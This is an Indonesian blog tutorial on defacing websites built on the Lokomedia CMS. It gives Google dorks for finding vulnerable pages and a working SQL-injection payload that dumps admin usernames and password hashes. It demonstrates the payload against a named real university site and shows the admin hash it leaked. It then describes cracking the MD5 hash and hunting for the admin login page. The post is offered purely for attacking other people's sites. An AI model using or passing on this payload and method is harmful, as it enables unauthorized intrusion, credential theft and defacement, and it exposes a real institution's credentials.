Tutorial Deface Metode SQL Lokomedia
Selasa, 18 Februari 2020
Tambah Komentar
Hii sobat kali ini saya akan membagikan tutorial kepada kalian, tutorial kali ini kita akan bahas Deface Metode SQL Lokomedia.
Yukk Gasken aja sobat..
Bahan Bahan yang kalian perlukan :
- Hp/Pc
- Internet
Untuk Dork Nya :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Kurang banyak? bisa kalian lihat lebih banyak (Klik Disini)
Exploit Nya :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+
Step by Step :
1. Yang Pertama kalian dorking dulu di google dengan Dork yang di atas. Setelah kalian dorking pilih salah satu web.
2. Disini saya menemukan target http://iad.unmul.ac.id/statis-1-profil.html
Lalu kalian tambahkan exploit nya di belakang angka contoh http://iad.unmul.ac.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+-profil.html
2. Lalu kalian enter maka nanti ada username dan pass nya contoh gambar di bawah.
Username: admin
Password: 70a35d7846649eb4e50d1e5d4d567b40
Nah itu saya dapat user dan pass nya langsung tanpa saya tambahkan view-source:
Ada cara ke dua untuk mencari user dan pass nya dengan cara tambahkan view-source: di bagian depan url.
Contoh : view-source:iad.unmul.ac.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+-profil.html
3. Jika sudah ketemu user dan pass nya tapi masih berbentuk md5. Lalu kalian pergi ke Md5 Hash untuk mengehash password nya biar jadi semula.
Web Untuk Hash Nya :
Link 1 :
Link 2
Dan setelah kalian hash dan ketemu password semula nya. Maka kalian cari adlog nya contoh.
https://site.com/admin
https://site.com/adminweb
https://site.com/adminlogin.php
Atau kalian bisa gunakan dengan Apk (Admin Finder)
Good Luck!!!
Belum ada Komentar untuk "Tutorial Deface Metode SQL Lokomedia"
Posting Komentar